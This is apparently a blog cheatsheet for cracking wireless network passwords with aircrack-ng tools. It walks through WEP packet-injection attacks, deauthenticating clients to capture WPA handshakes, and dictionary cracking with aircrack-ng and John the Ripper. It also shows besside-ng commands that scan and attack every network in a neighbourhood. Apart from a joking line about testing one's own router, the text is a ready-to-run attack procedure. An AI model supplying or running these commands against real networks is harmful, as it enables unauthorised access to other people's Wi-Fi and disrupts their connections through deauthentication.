Here are some cheatsheets about wireless cracking. Easy stuff (just for testing your own routers :P ).
First you have to put your interface in monitor mode:
airmon-ng # list interfaces
airmon-ng start wlan0 # this will create a mon0 interface which should be able to inject
Then, get the info of your router (and adjacents) with airodump-ng mon0
When you get yours (should be WEP for this attack), note down ESSID, BSSID and Channel.
Now focus the sniff in your router:
airodump-ng -a --ivs -w out --channel <channel> --bssid <bssid> mon0
This will create an out.cap
file and it will write only interesting packages (ivs).
You can use my tool wepcrackeator. It's really easy to use and will guide you and launch the commands for you.
If you want to know what you are doing, then here are the commands.
First execute what's in Common section.
Now we need to associate with the router, execute the following:
aireplay-ng -1 6000 -o 1 -q 10 --ignore-negative-one -a <bssid> -h <mymac> mon0
Once associated, we are going to use the p0841 injection attack:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <mymac> --ignore-negative-one mon0
If you want to deauthenticate a client to get packages, use the following command:
aireplay-ng -0 5 -a <bssid> --ignore-negative-one mon0
And now you should be getting data for start the cracking process, if not maybe
you need to use other attack like ChopChop or fragmentation, just execute
aireplay-ng --help
and see the other attacks, mayble a simple ARP injection
could do the trick.
Now launch aircrack-ng and let it cracking while getting data from the router:
aircrack-ng -a 1 out.cap
It will launch the cracking process when it gets more ivs, so just wait for it.
WPA keys can be obtained using dictionaries (or bruteforce) against handshakes.
First execute what's in Common section.
Now we need a client to connect to the router. Connect your phone or other device and you'll see the handshake on top of airodump-ng. If not, try to deauthenticate a random client using aireplay-ng:
aireplay-ng -0 5 -a <bssid> mon0
or force a client to deauthenticate with:
aireplay-ng -0 5 -a <bssid> -c <client> mon0
Once you get the handshake you can stop airodump-ng and start cracking it.
Like in the previous method, first put your interface in monitor mode:
airmon-ng # lists interfaces
airmon-ng start wlan0 # this will create a mon0 interface which should be able to inject
Then, to scan the whole neigborhood (not recommended) use the following command:
besside-ng -W -vv mon0
To scan an specific bssid (your router) use:
besside-ng -W -c <channel> -b <bssid> -vv <interface>
Both commands will create a file wpa.cap where you have executed the command. This file will contain only handshakes, so you can crack it once you get it. The command will scan the router and try to deauthenticate clients to get the handshake, so it will automate the airodump-ng/aireplay-ng commands.
Just use aircrack-ng
for the task:
aircrack-ng -w <dict-file> <cap-file>
# where cap-file is out.cap in first example or wpa.cap in the second one
If there are several handshakes of several routers, it will ask which one. You
can force it at the beginning adding -b <bssid>
in the aircrack-ng command.
If you need to be able to pause aircrack-ng and resume it later you'll need to
make use of John the Ripper
You should launch the cracking process with this command:
john --session=wpa --stdout --wordlist=<dict-file> | aircrack-ng -w - -b <bssid> wpa.cap
To pause it just hit Ctrl+c once.
To restore it, use the following command:
john --restore=wpa | aircrack-ng -w - -b <bssid> wpa.cap